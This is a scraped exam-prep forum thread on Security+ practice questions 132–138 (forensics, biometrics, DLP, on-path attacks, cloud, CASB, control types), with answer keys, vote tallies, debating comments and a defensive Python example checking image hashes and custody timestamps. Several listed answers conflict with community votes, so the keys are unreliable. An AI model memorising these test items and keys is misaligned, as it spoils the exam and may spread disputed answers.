"time zone offsets between transportation regions" - between transportation of evidence, not while gathering
upvoted 1 times

Ay_ma Highly Voted 4 months, 3 weeks ago
Selected Answer: B
If you read through the forensics chapter in Darril Gibson's (Ebook PG. 779) Sec+ guide, Option B will make sense to you.
Chain of Custody is one of the important parts of forensics, cause someone has to take responsibility for protecting the evidence. Your evidence
also always has to show exact dates. And in this question, the evidence needed to be transported to multiple geographical locations before it got
to the judge. So if there's a mismanagement of dates and times, it won't be legally admissible in court, cause 2 rules have been violated.
upvoted 11 times

Blake89 Most Recent 1 week, 4 days ago
Selected Answer: B
"Regardless of the type of forensic data that is obtained or handled, it is important to maintain chain of custody if the forensic case may result in
a legal case." - CompTIA Study Guide book
upvoted 1 times

Boubou480 4 weeks ago
Selected Answer: A
A. The forensic investigator forgot to run a checksum on the disk image after creation.

A checksum is a numerical value that is calculated based on the contents of a file. It is used to verify the integrity of the file. If a checksum is not
run on the disk image after it is created, there is no way to verify that the contents of the disk image are an exact copy of the original hard drive.
Without this verification, the judge may determine that the evidence gathered from the hard drive is not admissible.

Option B is not a valid reason for the judge's decision because the chain of custody form is used to document the handling and movement of
evidence, not to verify the integrity of the evidence. Option C is not a valid reason because taking a RAM image is not necessary for the
admissibility of evidence from a hard drive. Option D is not a valid reason because the way in which the hard drive was transported does not
affect the integrity of the evidence on the drive.
upvoted 4 times

alwaysrollin247 1 month, 2 weeks ago
Selected Answer: B
If the time zone of the suspect computer is not identified prior to extracting and viewing any Internet history or cache data then the date/time
stamps may not be accurately represented! You MUST establish the correct settings prior to importing any data.

https://kb.digital-detective.net/display/BF/Identification+of+Time+Zone+Settings+on+Suspect+Computer
upvoted 1 times

bhigh14 1 month, 3 weeks ago
Selected Answer: B

From the Phoenix TS Student Manual:


"Forensics is the science of collecting evidence that's admissible in court. Admissible forensic evidence needs to be relevant to a legal case,
sufficient in detail to prove a claim, and have a documented chain of custody proving that it was collected legitimately and hasn't been altered
since."
Based on that, I'll go with B.
upvoted 1 times
Jimbobilly 1 month, 3 weeks ago
Selected Answer: A
If the forensic investigator forgot to run a checksum on the disk image after creation, it could indicate that the integrity of the image is uncertain.
This could lead the judge to conclude that the evidence gathered from the hard drive is not admissible, because it cannot be verified that the
evidence has not been tampered with or altered in any way.
upvoted 2 times

afazaeli 1 month, 3 weeks ago
A. Checksum makes sure of integrity
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: B
A judge determined that evidence gathered from a hard drive was not admissible because the chain of custody form did not note time zone
offsets between transportation regions. In a criminal investigation, the chain of custody refers to the documentation that records the movement
and handling of physical evidence, such as a hard drive, from the time it is seized to the time it is presented in court. The chain of custody must
be properly documented and maintained in order for the evidence to be considered admissible in court. If the chain of custody is not properly
documented, it can be argued that the evidence may have been tampered with or that its integrity has been compromised. In this case, the judge
determined that the chain of custody form did not adequately record the time zone offsets between transportation regions, and therefore the
evidence from the hard drive was not admissible. Options A, C, and D are not accurate explanations for why the evidence from the hard drive
was not admissible. Running a checksum on the disk image, taking a RAM image, and properly storing the hard drive in an antistatic bag are all
important steps in the forensic process, but they are not directly related to the admissibility of evidence in court
upvoted 1 times

Sanjucbsa 1 month, 4 weeks ago
Selected Answer: A
Perform a hash test analysis to further authenticate the working clone. Performing a hash test ensures that the data we obtain from the previous
bit-by-bit copy procedure is not corrupt and reflects the true nature of the original evidence. If this is not the case, then the forensic analysis may
be flawed and may result in problems, thus rendering the copy non-authentic.
upvoted 1 times

Kalender 2 months, 1 week ago
Selected Answer: B
"Courts will rule the evidence inadmissible if there is a lack
of adequate control, or even a lack of documentation showing that
personnel maintained adequate control. However, the chain of
custody provides proof that personnel handled the evidence
properly."
Darril Gibson's book
upvoted 3 times

J_Ark1 2 months, 4 weeks ago
Selected Answer: B
Anything to do with the Court and one of the answers says "Chain of custody" logically go for that as the answer as those are the key words you
need to look out for, unless all the answers are to do with the chain of custody then i would go for A which checks the file integrity.
upvoted 2 times

Orean 3 months ago
Selected Answer: B
This is incredibly vague, but B is the only plausible answer.

None of the other options are detailed in the rules of evidence, which are too esoteric for the judge to care about anyway. They may or may not
impact the probative value of the evidence, but they won't render them inadmissible.
upvoted 1 times

DanteSurman 3 months ago
"A hash is a checksum value placed on evidence to prove the integrity of the evidence."
By
upvoted 2 times

Strykar 4 months, 1 week ago
It's B. Not A - the judge has nothing to do with the checksum run. He doesn't need to know that. He just follows the chain of custody.
upvoted 5 times

Bodatiousbob 4 months, 2 weeks ago
Selected Answer: A
Of solution A and B, A seems to be a more serious reason for the judge to dismiss on
upvoted 6 times

andrizo 3 months, 3 weeks ago
Hash what? hashbrown?
upvoted 3 times

03allen 3 months ago
lol, yes, same here.
A would be for the forensics team.
upvoted 1 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: A
I think it is A, I quote from my study guide:

Evidence in court cases is typically legally admissible if it is offered to prove the facts of a case and it does not violate the law. To determine if
evidence is admissible, criteria such as the relevance and reliability of the evidence, whether the evidence was obtained legally, and whether the
evidence is authentic, are all applied. Evidence must be the best evidence available, and the process and procedures should stand up to
challenges in court.
In addition to these requirements, admissibility for digital forensics requires that the data be intact and unaltered and have provably remained
unaltered before and during the forensic process.

A lot of talk about alteration of data, hence I think checksum is a better answer
upvoted 6 times
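The two points argued in this thread, an integrity hash on the image and a chain-of-custody form that records time zone offsets, in one added illustration. This is example code written for this page, not from the thread or any study guide; the image bytes, handler names and custody entries are constructed.

```python
"""Added example for the Question #132 discussion: an acquisition hash plus a
chain-of-custody log that records each hand-off with its UTC offset. Illustration
code written for this page; the image bytes and custody entries are constructed."""
import hashlib
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Optional


def hash_image(image: bytes) -> str:
    """SHA-256 of an acquired disk image. Recorded right after acquisition, it
    lets anyone later prove a working copy is bit-for-bit identical."""
    return hashlib.sha256(image).hexdigest()


@dataclass
class CustodyEntry:
    """One hand-off on the chain-of-custody form."""
    when: datetime        # must carry a time zone offset
    handler: str
    action: str           # e.g. "seized and imaged", "transported", "received"
    image_sha256: str     # hash re-checked at this hand-off


def verify_chain(entries: List[CustodyEntry], acquisition_sha256: str,
                 current_image: bytes) -> List[str]:
    """Return the problems found; an empty list means the chain holds.
    Checks: every timestamp has an offset, hand-offs stay chronological once
    normalised to UTC, the recorded hash never changed, and the image presented
    now still matches the acquisition hash."""
    problems: List[str] = []
    prev_utc: Optional[datetime] = None
    for i, e in enumerate(entries):
        if e.when.utcoffset() is None:          # naive datetime: offset not noted
            problems.append(f"entry {i} ({e.action}): no time zone offset recorded")
            continue
        now_utc = e.when.astimezone(timezone.utc)
        if prev_utc is not None and now_utc < prev_utc:
            problems.append(f"entry {i} ({e.action}): precedes the previous "
                            "hand-off once offsets are applied")
        prev_utc = now_utc
        if e.image_sha256 != acquisition_sha256:
            problems.append(f"entry {i} ({e.action}): recorded hash differs "
                            "from acquisition hash")
    if hash_image(current_image) != acquisition_sha256:
        problems.append("current image does not match acquisition hash")
    return problems


# Constructed evidence (not real case data).
ORIGINAL_IMAGE = b"\x00" * 512 + b"constructed disk image for the example" + b"\xff" * 64
TAMPERED_IMAGE = ORIGINAL_IMAGE[:-1] + b"\x00"   # a single byte changed
ACQ_HASH = hash_image(ORIGINAL_IMAGE)

EST = timezone(timedelta(hours=-5))   # seizure site
UTC = timezone.utc                    # receiving lab

# Seized 22:30 EST on 10 Jan = 03:30 UTC on 11 Jan; the later entries follow it.
GOOD_CHAIN = [
    CustodyEntry(datetime(2023, 1, 10, 22, 30, tzinfo=EST), "Investigator A", "seized and imaged", ACQ_HASH),
    CustodyEntry(datetime(2023, 1, 11, 9, 0, tzinfo=UTC), "Courier B", "transported", ACQ_HASH),
    CustodyEntry(datetime(2023, 1, 11, 10, 15, tzinfo=UTC), "Examiner C", "received at lab", ACQ_HASH),
]

# Same form with one offset omitted and a "received" time that reads later on
# paper (01:00 on 11 Jan) but is earlier than the seizure once converted to UTC.
BAD_CHAIN = [
    CustodyEntry(datetime(2023, 1, 10, 22, 30, tzinfo=EST), "Investigator A", "seized and imaged", ACQ_HASH),
    CustodyEntry(datetime(2023, 1, 11, 0, 30), "Courier B", "transported", ACQ_HASH),  # no offset noted
    CustodyEntry(datetime(2023, 1, 11, 1, 0, tzinfo=UTC), "Examiner C", "received at lab", ACQ_HASH),
]

if __name__ == "__main__":
    print("good chain:", verify_chain(GOOD_CHAIN, ACQ_HASH, ORIGINAL_IMAGE) or "no problems")
    for p in verify_chain(BAD_CHAIN, ACQ_HASH, TAMPERED_IMAGE):
        print("bad chain:", p)
```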

Question #133 Topic 1

An organization wants to implement a biometric system with the highest likelihood that an unauthorized user will be denied access. Which of the
following should the organization use to compare biometric solutions?

A. FRR

B. Difficulty of use

C. Cost

D. FAR

E. CER

Correct Answer: E

Community vote distribution


D (52%) E (44%) 5%

stoneface Highly Voted 5 months ago
Selected Answer: E
Crossover Error Rate (CER)—the point at which FRR and FAR meet. The lower the CER, the more efficient and reliable the technology.
Errors are reduced over time by tuning the system. This is typically accomplished by adjusting the sensitivity of the system until CER is reached.
upvoted 25 times

PraygeForPass 2 weeks, 6 days ago
The reason I like FAR (False acceptance rate) is because the company is more focused on making sure unauthorized users will be denied
access. They aren't too worried about FRR (False rejection rate) as these users will already have access, so they don't need to focus on
comparing both FAR and FRR using CER. That is why I pick D.
upvoted 2 times

Halaa 4 months, 2 weeks ago
I agree with you.
As the sensitivity of a biometric system increases, FRRs will rise and FARs will drop.
upvoted 2 times

Danalyst 4 months, 3 weeks ago
Probably right, I chose D. FAR but the question is worded strangely, 'what should they compare against?'' CER would be more useful.
upvoted 4 times

comeragh Highly Voted 4 months, 4 weeks ago
Selected Answer: D
"with the highest likelihood that an unauthorized user will be denied access" - I would think this is D (False Acceptance Rate).
upvoted 15 times

Gino_Slim 3 months, 1 week ago
I hope you didn't select this on the exam...
upvoted 1 times

Mperor 2 months, 3 weeks ago
lo. you funny
upvoted 2 times

zzzfox 4 months, 3 weeks ago
False Acceptance Rate means the likelihood that an unauthorized user will be accepted (Acceptance).
upvoted 3 times

NICKJONRIPPER 2 months, 1 week ago
make this rate close to 0 to achieve the goal.
upvoted 2 times

Ranaer Most Recent 1 week, 2 days ago
Selected Answer: D
Here we are focused on "the highest likelihood that an unauthorized user will be denied access". Lets tackle this point by point.

A/ FRR - False rejection rate. This is when you are authorized, but the system rejects you. Not relevant.
B/ Difficulty of use - again, not relevant.
C/ Cost - again, not relevant.
D/ False acceptance rate - This is the occurrence when an unauthorized person IS accepted and allowed by the scanner. This is the exact metric
we need to work with to increase the likelihood of unauthorized users being denied. The lower the FAR, the less likely it is to let in unauthorized
users.
E/ Crossover error rate - This is the correlation between FRR and FAR. It provides the best compromise between security AND convenience.
Since in this question we DO NOT CARE about convenience, this is one of the wrong answers. We ONLY care about denying unauthorized
people.
upvoted 3 times
madmax1984 1 week, 5 days ago
Selected Answer: D
Answer is D
upvoted 1 times

sanlibo 2 weeks ago
Selected Answer: E
"Which of the following should the organization use to compare biometric solutions?"

Crossover Error Rate (CER)—the point at which FRR and FAR meet. The lower the
CER, the more efficient and reliable the technology.
upvoted 1 times

Boubou480 4 weeks ago
Selected Answer: A
D. FAR

The False Accept Rate (FAR) is the measure of the likelihood that an unauthorized user will be incorrectly granted access to a system. An
organization should choose a biometric system with a low FAR, as this will increase the likelihood that an unauthorized user will be denied
access.

The False Reject Rate (FRR) is the measure of the likelihood that an authorized user will be incorrectly denied access to a system. The Cost is the
price of the biometric system. The Difficulty of use is the ease or difficulty with which a person can use the system. The Crossover Error Rate
(CER) is the point at which the FRR and FAR are equal. An organization should prioritize choosing a system with a low FAR over these other
factors.
upvoted 2 times

Underdog79198 1 month ago
ChatGPT says D
upvoted 2 times

jhfdkjshfkjdsho 1 month, 2 weeks ago
Selected Answer: D
The Crossover Error Rate (CER) describes the point where the False Reject Rate (FRR) and False Accept Rate (FAR) are equal. CER is also known
as the Equal Error Rate (EER). The Crossover Error Rate describes the overall accuracy of a biometric system.
So, it asks for a minimum False Accept Rate (FAR)
upvoted 1 times

Jimbobilly 1 month, 3 weeks ago
Selected Answer: D
An organization that wants to implement a biometric system with the highest likelihood that an unauthorized user will be denied access should
choose a system with a low FAR.
upvoted 2 times

okay123 1 month, 3 weeks ago
Selected Answer: E
The organization wants to COMPARE biometric solutions. CER is "a comparison metric for different biometric devices and technologies; the error
rate at which FAR equals FRR. The lower the CER, the more accurate and reliable the biometric device."
upvoted 2 times

smudder 1 month, 3 weeks ago
Selected Answer: E
'compare' = crossover error rate
upvoted 2 times

deeden 2 months ago
Selected Answer: D
The question seems to be concerned about false acceptance, no mention of false rejection, or the two being balanced.
upvoted 2 times

tek7ila 2 months ago
Selected Answer: D
Also agree it should be D (FAR) - it's just that the question is worded strangely....
upvoted 3 times

Lynx_ 2 months, 1 week ago
Selected Answer: D

False acceptance rate = % of time an unauthorized user is granted access.


If we compare biometric products, then select one with the lowest False Acceptance, we can ensure fewer falsely accepted users. In other words
“the highest likelihood an unauthorized user will be denied”.
upvoted 4 times
Kalender 2 months, 1 week ago
Actually there is no option with an answer
the answer should be TRR (True Rejection Rate)
But there is no TRR option. Therefore, it can be said that the correct answer is not FAR!! i think so.
upvoted 1 times

Idkanything 2 months, 1 week ago
MUST not be FAR

False acceptance rate (FAR)


– Likelihood that an unauthorized user will be "accepted"
upvoted 1 times

FMMIR 2 months, 2 weeks ago
Selected Answer: A
The Crossover Error Rate (CER) describes the point where the False Rejection Rate (FRR) and False Accept Rate (FAR) are equal. CER is also
known as the Equal Error Rate (EER). The Crossover Error Rate describes the overall accuracy of a biometric system.
upvoted 2 times

FMMIR 1 month, 3 weeks ago
Sorry. I was wrong. The correct answer is D:

The organization should use the False Acceptance Rate (FAR) to compare biometric solutions. The FAR is the likelihood that an unauthorized
user will be granted access to a system when using a biometric authentication method. A biometric system with a low FAR will have a higher
likelihood of denying access to unauthorized users, making it a more secure option for the organization. Other factors such as the False
Rejection Rate (FRR), the cost, and the ease of use may also be important to consider, but the FAR is the most relevant metric for evaluating
the security of a biometric system.
upvoted 1 times

Question #134 Topic 1

A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special
precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate
network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage.
Which of the following is the BEST remediation for this data leak?

A. User training

B. CASB

C. MDM

D. DLP

Correct Answer: A

Community vote distribution


D (68%) A (23%) 6%

stoneface Highly Voted 5 months ago
Selected Answer: D
This would be handled perfectly by a DLP agent installed on those COPE devices.
upvoted 12 times

Warza Highly Voted 4 months, 3 weeks ago
Selected Answer: A
The first sentence legitimately tells you that they labeled the data properly for DLP and that the email system has no logs of DLP incidents. The
user downloaded it themselves and shared it manually through a cloud provider. This can be remedied with user training.
upvoted 11 times

Sezz 1 month ago
User Training does not make sense here. A trained user could also send this kind of sensitive or important info or files by mistake. Because of this
we have DLP.
upvoted 1 times

Orean 2 months, 4 weeks ago
Just because they labeled it doesn't mean they're already used in a DLP solution. Top-secret documents were a thing well before the advent
of the Digital Age and were labeled accordingly.

User-training seems implausible because the user seems to be doing this deliberately by sharing it with competitors, meaning they're
probably incorrigible in that regard.
upvoted 6 times

deeden 4 months, 2 weeks ago
Yeah... not sure how effective DLP is on personally enabled devices, especially when users have access to Yahoo or Gmail.
upvoted 1 times

andrizo 3 months, 3 weeks ago
it's a COPE device
upvoted 1 times

zzzfox 4 months, 3 weeks ago
Disagree, "passed to the competitor" indicate this person could be insider threat, user training wouldn't help at all.
upvoted 15 times

RonWonkers 4 months, 2 weeks ago
zzzfox has a good point
upvoted 1 times

Iwannabeabadasshacker Most Recent 23 hours, 48 minutes ago
C for God sake
you all stop following answers and voting the wrong one
cope= mdm not in place
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: D
The best remediation for this data leak would likely be the implementation of a Data Loss Prevention (DLP) system. A DLP system is designed to
prevent the unauthorized sharing of sensitive information by monitoring and controlling the transfer of data across networks. In this case, a DLP
system could have detected the unauthorized download of proprietary information from the employee's COPE tablet and prevented it from being
passed to the competitor via cloud storage. User training and the use of a Cloud Access Security Broker (CASB) could also help to prevent future
data leaks, but a DLP system would be the most effective solution in this scenario.
upvoted 1 times
deeden 2 months ago
Selected Answer: D
Agree with DLP. I can't see how user training would help. I mean, a document with "CONFIDENTIAL" label somehow inadvertently ended up in their
competitor's cloud drive. And so, I suggest MDM for tablets as compensating control, containerization.
upvoted 1 times

Blueteam 2 months, 2 weeks ago
"documents were downloaded from an employee's COPE tablet".
The MDM was not in place. The answer is C.
DLP is part of MDM management. There is no evidence that user had malintent or did something wrong.
upvoted 3 times

johnajwer 2 months, 2 weeks ago
Correct Answer: B
The leaked data was passed via Cloud Storage from a COPE tablet. From comptiaCert:

CASBs provide you with visibility into how clients and other network nodes are using cloud services. Some of the functions of a CASB are:

Enable single sign-on authentication and enforce access controls and authorizations from the enterprise network to the cloud provider.
Scan for malware and rogue or non-compliant device access.
Monitor and audit user and resource activity.
Mitigate data exfiltration by preventing access to unauthorized cloud services from managed devices.
upvoted 1 times

bengy78 2 months, 3 weeks ago
It's DLP. It says the user downloaded the files onto the COPE device. DLP would prevent this, the CASB would not. They could have simply
shared the files over Bluetooth or pulled the files via USB directly off the COPE device if DLP wasn't in place.
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: D
Answer: DLP (Data Loss Prevention)

The scenario mentions that the data was labeled, which would be indicative of DLP being configured; however, it doesn't mean that it was.
The data could be labeled just for business operations and nothing else. Also, since the question mentioned that data was transferred from an
employee's device and no security breach occurred, then it was likely an insider threat, which implementing DLP would have helped prevent.

If DLP was actually implemented, then when the employee attempted to transfer the proprietary information to the competitors cloud storage, the
action would be blocked by the DLP policy as it would detect the sensitive information or block based on the labeled data.
upvoted 3 times

Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: D
DLP would be the best solution, also you could use a CASB to specifically target the use of public cloud storage provider services, but I think
here you should go with DLP
upvoted 2 times

J_Ark1 2 months, 4 weeks ago
Selected Answer: D
DLP Prevents any user without admin permissions from stealing proprietary information even if they are an authorised user the question suggests
insider threat hence DLP measures needs to be properly implemented :)

Correct me if I'm wrong.


upvoted 2 times

kindis 3 months ago
I think DLP is already in place because of the labeled data. The employee downloaded the file and passed it through the cloud because there is
no CASB to protect the cloud. DLP solutions do not typically provide the best cloud coverage. CASB solutions do not provide
comprehensive DLP coverage.
I will go for CASB
upvoted 3 times

blacktaliban 3 months ago
Selected Answer: D
You can train users all day; it doesn't mean they still won't find a way to get information out.

D for me
upvoted 4 times

ostralo 3 months, 3 weeks ago
Label - this shows that DLP is already in place.
COPE - COPE programs should use containerization tools, such as the Work Profile in Android Enterprise or the Samsung Knox platform, to
maintain a separation between personal and work data and applications.
so, MDM is already there.

Now we can restrict the cloud storage apps using CASB. So I would go for CASB.
upvoted 2 times

andrizo 3 months, 3 weeks ago
a casb is mainly security though
upvoted 1 times

Fuzm4n 3 months, 3 weeks ago
Remediation to make sure it doesn't happen again. MDM. Lock down the device. I guess a DLP would be implemented with an MDM.
upvoted 1 times

andrizo 3 months, 3 weeks ago
i think too many people are overthinking it, just answer what's in the question
upvoted 1 times

Strykar 4 months, 1 week ago
Selected Answer: D
Insider threat. D is correct
upvoted 2 times

i_bird 4 months, 2 weeks ago
I think this question is simply asking, how to prevent data loss from insider threat attack

I'm leaning towards DLP, since user training is fruitless if the attack is not an external breach, but a pre-emptive inside attack from a COPE device
upvoted 1 times

Question #135 Topic 1

An attacker was eavesdropping on a user who was shopping online. The attacker was able to spoof the IP address associated with the shopping
site. Later, the user received an email regarding the credit card statement with unusual purchases. Which of the following attacks took place?

A. On-path attack

B. Protocol poisoning

C. Domain hijacking

D. Bluejacking

Correct Answer: A

Community vote distribution


A (92%) 8%

Josh_Feng Highly Voted 5 months ago
Selected Answer: A
On path attack is often known as man in the middle.
upvoted 6 times

banditring 5 months ago
I was getting confused as to what an on path attack is
upvoted 2 times

Boubou480 Most Recent 4 weeks ago
Selected Answer: C
C. Domain hijacking

Domain hijacking refers to the unauthorized acquisition of control over a domain name. In this case, the attacker was able to spoof the IP address
associated with the shopping site, which means they were able to redirect traffic intended for the legitimate website to a different website under
their control. This allowed the attacker to eavesdrop on the user while they were shopping online and potentially steal their credit card
information.

An on-path attack is an attack in which the attacker has control over a network along the path between the sender and the receiver. Protocol
poisoning is a type of attack in which an attacker modifies a protocol message in an attempt to disrupt or subvert normal communication.
Bluejacking is a type of attack in which an attacker sends unsolicited messages to Bluetooth-enabled devices. None of these attacks are directly
related to the scenario described in the question.
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: A
Answer: On-path attack

An On-path attack (Man in the Middle) occurs when an attacker places themselves between two devices (often a web browser and a web server)
and intercept or modify communications between the two.

In this question, the attacker was eavesdropping on the connection which means they placed themselves between the user and the shopping
site and intercepted the communication.

The attacker had likely captured credit card information or account information from the site to be able to make the purchases.
upvoted 1 times

Bogardinc 1 week, 1 day ago
Are you guys forgetting in the question it states "The attacker was able to spoof the IP address associated with the shopping site"
upvoted 1 times

alayeluwa 3 months, 3 weeks ago
Selected Answer: A
Man in the middle.
upvoted 1 times

ostralo 3 months, 3 weeks ago
Selected Answer: A
A,

FYI,
Domain hijacking is the act of changing the registration of a domain name without the permission of the original owner, or by abuse of privileges
on domain hosting and domain registrar systems.

upvoted 1 times
comeragh 4 months, 4 weeks ago
Selected Answer: A
"Eavesdropping" - On-Path
upvoted 2 times

KetReeb 5 months ago
A: On-path (MITM) - attacker was eavesdropping on the communications, spoofed the IP of the shopping site that the victim thought was legit, a
purchase was attempted, credit info intercepted.
upvoted 3 times

Question #136 Topic 1

A company is considering transitioning to the cloud. The company employs individuals from various locations around the world. The company
does not want to increase its on premises infrastructure blueprint and only wants to pay for additional compute power required. Which of the
following solutions would BEST meet the needs of the company?

A. Private cloud

B. Hybrid environment

C. Managed security service provider

D. Hot backup site

Correct Answer: B

Community vote distribution


B (100%)

RonWonkers Highly Voted 4 months, 2 weeks ago
Selected Answer: B
The company does not want to increase its on premises infrastructure blueprint, it's B.
upvoted 7 times

  Boubou480 Most Recent  4 weeks ago


B. Hybrid environment

A hybrid environment is a cloud computing model that combines on-premises infrastructure with a cloud infrastructure. This type of solution
would allow the company to retain control over some of its infrastructure while also taking advantage of the flexibility and scalability of the cloud.
This would allow the company to pay for additional compute power as needed and avoid the need to increase its on-premises infrastructure.

A private cloud is a cloud infrastructure that is operated solely for a single organization. It is not suitable for a company with employees located
around the world because it does not provide the flexibility and scalability of a public cloud. A managed security service provider is a third-party
that provides security services to an organization. It is not directly related to the company's need to transition to the cloud. A hot backup site is a
backup site that is always active and ready to take over in the event of a disaster. It is not related to the company's need to transition to the
cloud.
upvoted 1 times

  MathDayMan 3 months ago


B it's B.
upvoted 1 times

Question #137 Topic 1

After multiple on premises security solutions were migrated to the cloud, the incident response time increased. The analysts are spending a long
time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to
optimize the incident response time?

A. CASB

B. VPC

C. SWG

D. CMS

Correct Answer: C

Community vote distribution


A (84%) D (16%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
CASB, better way to keep track across multiple cloud-based security solutions > Open to discussion
upvoted 14 times

  zzzfox 4 months, 3 weeks ago


Agree, consider CASB can be deployed on-premises as well as cloud
upvoted 1 times

  mlonz Most Recent  1 week ago


A cloud access security broker (CASB) is a software tool or service deployed between an organization's network and the cloud provider. It
provides security by monitoring traffic and enforcing security policies.

A next-generation secure web gateway (SWG) provides proxy services for traffic from clients to Internet sites, such as filtering URLs and scanning
for malware.
upvoted 1 times

  Sandon 1 week, 4 days ago


Selected Answer: D
ChatGPT says the answer is D. Configuration management system
upvoted 1 times

  ExamLSMotor 1 week, 2 days ago


ChatGPT wrong bro
upvoted 3 times

  Sandon 1 week ago


Yes it is
upvoted 1 times

  shover 2 weeks, 6 days ago


As per the CompTIA SY0-601 acronym list: CMS: Content management system, not cloud management system. I'm sure cloud management
system is a real thing but according to the Sec+ exam objectives CMS is something totally different.
upvoted 2 times

  Kandy357 3 weeks, 3 days ago


Selected Answer: A
Answer should be CASB.
As per CompTIA Sec+ objectives, CMS is a content management system, not a cloud.
CMP term is used for Cloud Management Platforms.
upvoted 4 times

  shover 2 weeks, 6 days ago


Thanks, I was just about to say that when I went to look up the acronym in the objectives.
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: D
D. CMS

A Cloud Management System (CMS) is a tool that helps to manage and monitor cloud resources. It can be used to optimize incident response
time by providing a centralized platform for viewing and analyzing data from multiple cloud consoles. This can help analysts to more quickly trace
information and correlate data, as they do not have to switch between different consoles and deal with data in different formats.

A Cloud Access Security Broker (CASB) is a security solution that sits between an organization's on-premises infrastructure and the cloud and
helps to secure data in the cloud. A Virtual Private Cloud (VPC) is a virtual network that is dedicated to an organization and isolated from other
virtual networks in the cloud. A Secure Web Gateway (SWG) is a security solution that is used to protect an organization's users from internet-
based threats. None of these solutions are directly related to optimizing incident response time in the way that a CMS is.
upvoted 1 times
  mike47 1 month, 2 weeks ago
Selected Answer: A
CASB vs SWG
CASB is the more optimal solution for multiple on premises security solutions
CASB services are explicitly designed to fit the needs of large enterprises
You can access link and read about it:
https://www.gend.co/blog/casb-or-swg-which-is-best-option-for-your-enterprise
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
To optimize the incident response time, the company could implement a Cloud Management System (CMS). A CMS is a tool that allows an
organization to manage and monitor all of its cloud-based resources and services from a single, centralized platform. This would enable the
analysts to quickly access and correlate data from different cloud consoles and formats, reducing the time and effort required to respond to
security incidents. Other solutions such as a Cloud Access Security Broker (CASB) or a Secure Web Gateway (SWG) could also help to improve
security in the cloud, but a CMS would be the most effective solution for optimizing incident response time in this scenario. A Virtual Private
Cloud (VPC) would not be relevant in this context
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


The difference between a Cloud Access Security Broker (CASB) and a Cloud Management System (CMS) is that a CASB is a security solution
that sits between an organization's on-premises infrastructure and its cloud-based resources and services, while a CMS is a tool that allows
an organization to manage and monitor all of its cloud-based resources and services from a single, centralized platform. A CASB can help to
improve security by enforcing policies and controls on access to cloud-based resources, but it does not directly affect incident response time.
A CMS, on the other hand, can help to optimize incident response time by enabling analysts to quickly access and correlate data from
different cloud consoles and formats. Both solutions can be useful in optimizing security in the cloud, but they have different functions and
capabilities.
upvoted 1 times

  Halaa 4 months, 2 weeks ago


Selected Answer: A
https://www.instreamcorp.com/wp-content/uploads/2018/11/What-is-CASB.jpg
upvoted 2 times


  Halaa 4 months, 2 weeks ago


CASB provides critical security tool that help control , monitoring, compliance management , data security and threat protection that will
optimize incident response time.
upvoted 2 times

  Yuyuyakuza 4 months, 3 weeks ago


C. SWG. Deploy SWG as part of a SASE solution: a cloud-based service to inspect traffic and enforce policies without diverting traffic, essentially
unlike CASB, which hurts network performance and employee productivity.
upvoted 2 times

  okay123 5 months ago


When choosing between CASB and SWG, users have to weigh the protections offered by each solution and weigh their level of risk to choose
the right solution for them. A CASB solution with a native API integration can provide more granular protection than a simple in-line SWG
solution. In contrast, SWG solutions offer broader protection, providing a safe Internet use solution without some of the granular SaaS
protections that CASB offers.

https://www.checkpoint.com/cyber-hub/network-security/what-is-secure-web-gateway/secure-web-gateway-swg-vs-casb/
upvoted 2 times

Question #138 Topic 1

Which of the following control types would be BEST to use in an accounting department to reduce losses from fraudulent transactions?

A. Recovery

B. Deterrent

C. Corrective

D. Detective

Correct Answer: D

Community vote distribution


D (54%) C (41%) 5%

  okay123 Highly Voted  5 months ago


Detective controls – look for both fraudulent and unintentionally improper transactions after the fact. Examples of detective controls include
reconciliations, variance analyses, physical inventories, audits, and continuous monitoring through data analytics.
upvoted 12 times

  constant380 Most Recent  3 days, 2 hours ago


Selected Answer: C
Here, when we talk about corrective, the problem has in a sense already been detected. Detection happens before the corrective control so that it
does not happen again.
upvoted 1 times

  ronniehaang 4 days, 6 hours ago


Selected Answer: D
The BEST control type to use in an accounting department to reduce losses from fraudulent transactions is Detective. Detective controls are
designed to detect and alert on potential security incidents, including fraudulent transactions. They monitor and analyze activities and data, and
provide real-time or near real-time alerts and reports to help identify potential security incidents. Examples of detective controls include auditing,
logging, and monitoring systems, intrusion detection systems (IDS), and security information and event management (SIEM) systems.
upvoted 1 times

  madmax1984 1 week, 5 days ago


Selected Answer: C
Going with C here. Question states to "reduce losses from fraudulent transactions"... meaning issue has already been detected. Corrective
measures need to be put in place. Detective detects.
upvoted 1 times

  P0wned 3 weeks, 2 days ago


Selected Answer: D
D. Detective controls
Detective controls are designed to identify and report on security incidents, such as fraud or misuse of resources, and are best used to reduce
losses from fraudulent transactions. Examples of detective controls in an accounting department include regular audits, transaction monitoring,
and access logs that track who is making changes to financial records.
upvoted 1 times

  agustio19 3 weeks, 3 days ago


Corrective controls are implemented after detective controls to rectify the problem and (ideally) prevent it from happening again
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: D
D. Detective

Detective controls are used to detect and identify security incidents or deviations from normal behavior. They are used to alert an organization to
a problem so that corrective action can be taken. In an accounting department, detective controls would be the best type of control to use to
reduce losses from fraudulent transactions. For example, an organization might implement detective controls such as monitoring for unusual
patterns of activity or reviewing transaction logs to identify suspicious activity.

Recovery controls are used to restore an organization to a normal state after a security incident or disaster. Deterrent controls are used to
discourage or deter potential attackers from attempting to compromise an organization's security. Corrective controls are used to fix problems
that have been identified by detective controls. None of these control types are directly related to detecting and preventing fraudulent
transactions in the way that detective controls are.
upvoted 1 times

  mike47 1 month, 2 weeks ago


Selected Answer: D

Detective controls and Corrective controls are both used in accounting.


This is what makes this question tricky and the answer close.
Detective finds errors as they occur or happen.
